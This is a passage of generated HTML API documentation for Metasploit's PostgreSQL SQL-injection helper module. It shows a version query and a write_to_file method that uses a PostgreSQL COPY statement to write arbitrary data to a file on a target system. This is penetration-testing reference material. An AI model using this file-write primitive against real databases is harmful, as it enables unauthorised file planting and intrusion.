<span class='kw'>return</span> <span class='kw'>false</span> <span class='kw'>if</span> <span class='id identifier rubyid_output'>output</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='lparen'>(</span><span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:decode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_output'>output</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_output'>output</span><span class='rparen'>)</span> <span class='op'>==</span> <span class='id identifier rubyid_random_string'>random_string</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="version-instance_method">
#<strong>version</strong> &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the PostgreSQL version</p>
<pre class="code ruby"><code class="ruby">@return [String] The PostgreSQL version in use
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
43
44
45</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 43</span>
<span class='kw'>def</span> <span class='id identifier rubyid_version'>version</span>
<span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>version()</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="write_to_file-instance_method">
#<strong>write_to_file</strong>(fname, data) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Writes data to a file on the target system</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>fname</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The full-path to the file where data will be written</p>
</div>
</li>
<li>
<span class='name'>data</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The data to write</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
205
206
207</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 205</span>
<span class='kw'>def</span> <span class='id identifier rubyid_write_to_file'>write_to_file</span><span class='lparen'>(</span><span class='id identifier rubyid_fname'>fname</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_raw_run_sql'>raw_run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>copy (select &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_data'>data</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;) to &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fname'>fname</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:03:41 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink